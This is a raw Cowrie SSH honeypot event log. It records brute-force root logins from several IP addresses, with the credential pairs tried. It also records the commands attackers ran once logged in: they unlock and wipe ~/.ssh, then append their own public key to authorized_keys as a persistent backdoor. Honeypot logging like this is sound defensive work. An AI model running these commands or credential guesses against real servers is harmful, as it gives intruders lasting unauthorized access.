{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:45:51.489517Z","src_ip":"152.32.129.236","session":"71fe39c49c02"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ2wsx#EDC","message":"login attempt [root/!QAZ2wsx#EDC] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:45:52.345716Z","src_ip":"152.32.129.236","session":"71fe39c49c02"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:45:52.773589Z","src_ip":"152.32.129.236","session":"71fe39c49c02"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:45:52.774465Z","src_ip":"152.32.129.236","session":"71fe39c49c02"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:45:52.775302Z","src_ip":"152.32.129.236","session":"71fe39c49c02"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:45:52.980582Z","src_ip":"152.32.129.236","session":"71fe39c49c02"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:45:53.502809Z","src_ip":"152.32.129.236","session":"71fe39c49c02"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:45:53.503483Z","src_ip":"152.32.129.236","session":"71fe39c49c02"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:45:53.709672Z","src_ip":"152.32.129.236","session":"71fe39c49c02"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:45:53.710639Z","src_ip":"152.32.129.236","session":"71fe39c49c02"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":52680,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa5e1b5a1da7","protocol":"ssh","message":"New connection: 152.32.129.236:52680 (1.2.3.4:22) [session: aa5e1b5a1da7]","sensor":"my-vps","timestamp":"2025-09-09T00:45:53.902624Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:45:53.903502Z","src_ip":"152.32.129.236","session":"aa5e1b5a1da7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:45:54.101593Z","src_ip":"152.32.129.236","session":"aa5e1b5a1da7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:45:54.934442Z","src_ip":"152.32.129.236","session":"aa5e1b5a1da7"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:45:56.134845Z","src_ip":"152.32.129.236","session":"aa5e1b5a1da7"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":52690,"dst_ip":"1.2.3.4","dst_port":22,"session":"53e317e2c7fc","protocol":"ssh","message":"New connection: 152.32.129.236:52690 (1.2.3.4:22) [session: 53e317e2c7fc]","sensor":"my-vps","timestamp":"2025-09-09T00:45:56.334459Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:45:56.335396Z","src_ip":"152.32.129.236","session":"53e317e2c7fc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:45:56.535347Z","src_ip":"152.32.129.236","session":"53e317e2c7fc"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:45:57.380296Z","src_ip":"152.32.129.236","session":"53e317e2c7fc"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:45:57.581928Z","src_ip":"152.32.129.236","session":"53e317e2c7fc"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:45:57.586466Z","src_ip":"152.32.129.236","session":"71fe39c49c02"}
{"eventid":"cowrie.session.connect","src_ip":"51.250.72.176","src_port":38002,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb03055102b2","protocol":"ssh","message":"New connection: 51.250.72.176:38002 (1.2.3.4:22) [session: eb03055102b2]","sensor":"my-vps","timestamp":"2025-09-09T00:46:07.902243Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:46:07.903024Z","src_ip":"51.250.72.176","session":"eb03055102b2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:46:07.942440Z","src_ip":"51.250.72.176","session":"eb03055102b2"}
{"eventid":"cowrie.login.success","username":"root","password":"qwe123!!!","message":"login attempt [root/qwe123!!!] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:46:08.140141Z","src_ip":"51.250.72.176","session":"eb03055102b2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:46:08.285480Z","src_ip":"51.250.72.176","session":"eb03055102b2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:46:08.286172Z","src_ip":"51.250.72.176","session":"eb03055102b2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:46:08.287153Z","src_ip":"51.250.72.176","session":"eb03055102b2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:46:08.327852Z","src_ip":"51.250.72.176","session":"eb03055102b2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:46:08.424870Z","src_ip":"51.250.72.176","session":"eb03055102b2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:46:08.425691Z","src_ip":"51.250.72.176","session":"eb03055102b2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:46:08.467575Z","src_ip":"51.250.72.176","session":"eb03055102b2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:46:08.468552Z","src_ip":"51.250.72.176","session":"eb03055102b2"}
{"eventid":"cowrie.session.connect","src_ip":"51.250.72.176","src_port":40846,"dst_ip":"1.2.3.4","dst_port":22,"session":"f31b7fb1bc30","protocol":"ssh","message":"New connection: 51.250.72.176:40846 (1.2.3.4:22) [session: f31b7fb1bc30]","sensor":"my-vps","timestamp":"2025-09-09T00:46:14.498947Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:46:14.499861Z","src_ip":"51.250.72.176","session":"f31b7fb1bc30"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:46:14.532107Z","src_ip":"51.250.72.176","session":"f31b7fb1bc30"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:46:14.703187Z","src_ip":"51.250.72.176","session":"f31b7fb1bc30"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:46:14.736827Z","src_ip":"51.250.72.176","session":"f31b7fb1bc30"}
{"eventid":"cowrie.session.closed","duration":"6.8","message":"Connection lost after 6.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:46:14.742249Z","src_ip":"51.250.72.176","session":"eb03055102b2"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":55751,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0a700b081f4","protocol":"ssh","message":"New connection: 103.100.209.195:55751 (1.2.3.4:22) [session: b0a700b081f4]","sensor":"my-vps","timestamp":"2025-09-09T00:46:27.811980Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:46:27.818753Z","src_ip":"103.100.209.195","session":"b0a700b081f4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:46:28.016818Z","src_ip":"103.100.209.195","session":"b0a700b081f4"}
{"eventid":"cowrie.login.failed","username":"boris","password":"pass","message":"login attempt [boris/pass] failed","sensor":"my-vps","timestamp":"2025-09-09T00:46:28.814150Z","src_ip":"103.100.209.195","session":"b0a700b081f4"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":48978,"dst_ip":"1.2.3.4","dst_port":22,"session":"489dd3c78900","protocol":"ssh","message":"New connection: 43.156.132.147:48978 (1.2.3.4:22) [session: 489dd3c78900]","sensor":"my-vps","timestamp":"2025-09-09T00:46:29.087013Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:46:29.087968Z","src_ip":"43.156.132.147","session":"489dd3c78900"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:46:29.343923Z","src_ip":"43.156.132.147","session":"489dd3c78900"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:46:30.017112Z","src_ip":"103.100.209.195","session":"b0a700b081f4"}
{"eventid":"cowrie.login.success","username":"root","password":"A12345","message":"login attempt [root/A12345] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:46:30.437494Z","src_ip":"43.156.132.147","session":"489dd3c78900"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:46:31.027457Z","src_ip":"43.156.132.147","session":"489dd3c78900"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:46:31.028161Z","src_ip":"43.156.132.147","session":"489dd3c78900"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:46:31.029366Z","src_ip":"43.156.132.147","session":"489dd3c78900"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:46:31.286880Z","src_ip":"43.156.132.147","session":"489dd3c78900"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:46:31.863602Z","src_ip":"43.156.132.147","session":"489dd3c78900"}
